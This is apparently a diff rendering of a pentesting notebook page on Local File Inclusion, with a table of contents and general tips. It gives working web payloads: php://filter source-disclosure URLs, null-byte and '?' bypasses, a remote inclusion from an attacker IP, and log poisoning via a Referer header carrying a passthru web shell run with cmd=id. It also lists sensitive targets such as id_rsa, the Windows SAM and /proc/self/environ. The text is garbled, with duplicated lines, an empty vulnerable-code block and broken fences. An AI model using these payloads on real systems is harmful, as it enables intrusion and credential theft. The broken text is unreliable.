Updates local_file_inclusion.md

        * networking

    * [Firewalls](firewalls.md)

    * [General tips and tricks](general_tips.md)

* [Recon/information gathering phase](scanning.md)

* [Recon\/information gathering phase](scanning.md)

    * [Passive information gatherig](passive_information_gatherig.md)

        * [Email Harvesting](email_harvesting.md)

        * [Users](users.md)

            * [DNS Zone Transfer Attack](dns_zone_transfer_attack.md)

* [Vulnerability analysis](vulnerability_analysi1s.md)

    * Server-side vulnerabilities

       * [Common ports/services and how to use them](list_of_common_ports.md)

        * [Common ports\/services and how to use them](list_of_common_ports.md)

        * [Port Knocking](port_knocking.md)

    * [Client-side vulnerabilities](web-services.md)

        * [Common web-services](common_web-services.md)

        * [Attacking the user](attacking_the_user.md)

            * [Clickjacking](clickjacking.md)

            * [Broken authentication or session management](broken_authentication_or_session_management.md)

           * [Text/content-injection](text-injection.md)

            * [Text\/content-injection](text-injection.md)

            * [Subdomain takeover](subdomain_takeover.md)

            * [Cross Site Request Forgery](cross_site_request_forgery.md)

            * [Cross-site-scripting](cross-site-scripting.md)

* [Binary Exploitation](binary_exploitation2.md)

    * [Tools](tools.md)

    * [Basics of assembly](binary_exploitation.md)

   * [Buffer overflow (BOF)](buffer_overflow_bof.md)

    * [Buffer overflow \(BOF\)](buffer_overflow_bof.md)

    * [Vulnerabilities](vulnerabilities.md)

    * [Exploit examples and tutorials](exploit_examples_and_tutorials.md)

    * [Setuid c-code](setuid_c-code.md)

# General tips

## Disposable email

If you are signing up for a lot of accounts you can use a disposible email. You just enter the email account you want for that second, and then you can view it. But remember, so can everyone else.  

https://www.mailinator.com

[https://www.mailinator.com](https://www.mailinator.com)

## Base64 encode/decode

decoded = base64.b64decode("aGVqc2Fu")

print decoded

```

## Default passwords

http://www.defaultpassword.com/

[http://www.defaultpassword.com/](http://www.defaultpassword.com/)

## Getting GUI on machine that does not have RDP or VNC

You can forward X over SSH.  

http://www.vanemery.com/Linux/XoverSSH/X-over-SSH2.html

 No newline at end of file

[http://www.vanemery.com/Linux/XoverSSH/X-over-SSH2.html](http://www.vanemery.com/Linux/XoverSSH/X-over-SSH2.html)

With this we can get a hold of many sensitive files

In most web-services that use a database we can get a hold of the database username and password:

in wordpress the file is **wp-config.php**  

And once you have gotten access to that you can do other things. Check out the chapter on mysql.

This is the definitive guide to Local File inclusion  

https://highon.coffee/blog/lfi-cheat-sheet/

[https://highon.coffee/blog/lfi-cheat-sheet/](https://highon.coffee/blog/lfi-cheat-sheet/)

And this  

http://securityidiots.com/Web-Pentest/LFI

[http://securityidiots.com/Web-Pentest/LFI](http://securityidiots.com/Web-Pentest/LFI)

And this:

https://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/

[https://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/](https://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/)

The vulnerability stems from unsanitized user-input

Here is an example of php-code vulnerable to LFI. As you can see we just pass in the url-parameter into the require-function without any sanitization. So the user can just add the path to any file.

```

# index.php

    <?php

```

http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index

```

Here you use a php-filter to convert it all into base64. So in return you get the whole page base64 encoded. Now you only need to decode it. Save the base64-text into a file and then run:

```

base64 -d savefile.php

```

### Using the nullbyte handeling .php

### Bypassing .php and other extra file-endings

THe nullbyte techniqu works in versions below php 5.3. So look out for that.

The nullbyte technique works in versions below php 5.3. So look out for that.

If the include looks like this:

The php i added to the filename, this will mean that we will not be able to find the files we are looking for. Since the file /etc/passwd.php does not exist. However, if we add the nullbyte to the end of our attack-string the **.php** will not be taken into account. So we add **%00** to the end of our attackstring.

As noted above this wll only work for php below 5.3. So another way to deal with it is just to add a question mark.This way the stuff after gets interpreted as a paramter and therefore excluded.

`http://example.com/page=http://192.168.1.101/maliciousfile.txt?`

## Linux

### Tricks

curl -s http://example.com/gallery.php?page=/etc/passwd -b cookiefile

```

### Sensitive file

This is the default layout of important apache files.  

https://wiki.apache.org/httpd/DistrosDefaultLayout

[https://wiki.apache.org/httpd/DistrosDefaultLayout](https://wiki.apache.org/httpd/DistrosDefaultLayout)

```

/etc/issue (A message or system identification to be printed before the login prompt.)

$USER/.bash_history or .profile

/root/.bash_history or .profile

```

Comes from here: https://gist.github.com/sckalath/a8fd4e754a72015aa0b8

Comes from here: [https://gist.github.com/sckalath/a8fd4e754a72015aa0b8](https://gist.github.com/sckalath/a8fd4e754a72015aa0b8)

/etc/mtab  

/etc/inetd.conf  

/var/log/dmessage

#### Web server files

```

# Usually found in the root of the website

.htaccess

```

#### SSH

```

authorized_keys

id_rsa

id_rsa.pub

known_hosts

```

#### Logs

```

/etc/httpd/logs/acces_log 

/etc/httpd/logs/error_log 

#### General files

First you need to check the passwd file to find the users.

```

cat /etc/passwd

cat /etc/group

"Under Linux, /proc includes a directory for each running process, including kernel processes, in directories named /proc/PID, where PID is the process number. Each directory contains information about one process, including: /proc/PID/cmdline, the command that originally started the process."

https://en.wikipedia.org/wiki/Procfs

[https://en.wikipedia.org/wiki/Procfs](https://en.wikipedia.org/wiki/Procfs)

[https://blog.netspi.com/directory-traversal-file-inclusion-proc-file-system/](https://blog.netspi.com/directory-traversal-file-inclusion-proc-file-system/)

https://blog.netspi.com/directory-traversal-file-inclusion-proc-file-system/

```

/proc/sched_debug # Can be used to see what processes the machine is running

/proc/mounts

/proc/self/environ

```

## Bruteforcing SSH known_hosts

https://blog.rootshell.be/2010/11/03/bruteforcing-ssh-known_hosts-files/

## Bruteforcing SSH known\_hosts

[https://blog.rootshell.be/2010/11/03/bruteforcing-ssh-known\_hosts-files/](https://blog.rootshell.be/2010/11/03/bruteforcing-ssh-known_hosts-files/)

## LFI to shell

Under the right circumstances you might be able to get a shell from a LFI

### Log files

There are some requirements. We need to be able to read the apache2 log files, either the success.log or the error.log

So once you have found a LFI vuln you have to inject php-code into the log file and then execute it.

Connection: close

```

Or in the referer parameter.

```

GET / HTTP/1.1

Referer: <? passthru($_GET[cmd]) ?>

Connection: close

```

2. Execute it

1. Execute it

   In the browser:

   ```

   http://192.168.1.102/index.php?/var/log/apache2/access.log&cmd=id

   ```

### /proc/self/environ

We can also inject code into /proc/self/environ through the user-agent

https://www.exploit-db.com/papers/12992/

[https://www.exploit-db.com/papers/12992/](https://www.exploit-db.com/papers/12992/)

[https://www.youtube.com/watch?v=ttTVNcPnsJY](https://www.youtube.com/watch?v=ttTVNcPnsJY)

## Windows

https://www.youtube.com/watch?v=ttTVNcPnsJY

* Fingerprinting

## Windows

  _:\boot.ini  

    _:\WINDOWS\win.ini  

    _:\WINNT\win.ini  

    _:\WINDOWS\Repair\SAM  

    _:\WINDOWS\php.ini  

    _:\WINNT\php.ini  

    _:\Program Files\Apache Group\Apache\conf\httpd.conf  

    _:\Program Files\Apache Group\Apache2\conf\httpd.conf  

    _:\Program Files\xampp\apache\conf\httpd.conf  

    _:\php\php.ini  

    _:\php5\php.ini  

    _:\php4\php.ini  

    _:\apache\php\php.ini  

    _:\xampp\apache\bin\php.ini  

    _:\home2\bin\stable\apache\php.ini  

    _:\home\bin\stable\apache\php.ini

* Logs

  _:\Program Files\Apache Group\Apache\logs\access.log  

    _:\Program Files\Apache Group\Apache\logs\error.log

* PHP Session Locations

  _:\WINDOWS\TEMP\  

    _:\php\sessions\  

    _:\php5\sessions\  

    _:\php4\sessions\

- Fingerprinting

    *:\boot.ini

    *:\WINDOWS\win.ini

    *:\WINNT\win.ini

    *:\WINDOWS\Repair\SAM

    *:\WINDOWS\php.ini

    *:\WINNT\php.ini

    *:\Program Files\Apache Group\Apache\conf\httpd.conf

    *:\Program Files\Apache Group\Apache2\conf\httpd.conf

    *:\Program Files\xampp\apache\conf\httpd.conf

    *:\php\php.ini

    *:\php5\php.ini

    *:\php4\php.ini

    *:\apache\php\php.ini

    *:\xampp\apache\bin\php.ini

    *:\home2\bin\stable\apache\php.ini

    *:\home\bin\stable\apache\php.ini

- Logs

    *:\Program Files\Apache Group\Apache\logs\access.log

    *:\Program Files\Apache Group\Apache\logs\error.log

- PHP Session Locations

    *:\WINDOWS\TEMP\

    *:\php\sessions\

    *:\php5\sessions\

    *:\php4\sessions\

## References:

https://nets.ec/File_Inclusion

https://gist.github.com/sckalath/da1a232f362a700ab459

 No newline at end of file

[https://nets.ec/File\_Inclusion](https://nets.ec/File_Inclusion)  

[https://gist.github.com/sckalath/da1a232f362a700ab459](https://gist.github.com/sckalath/da1a232f362a700ab459)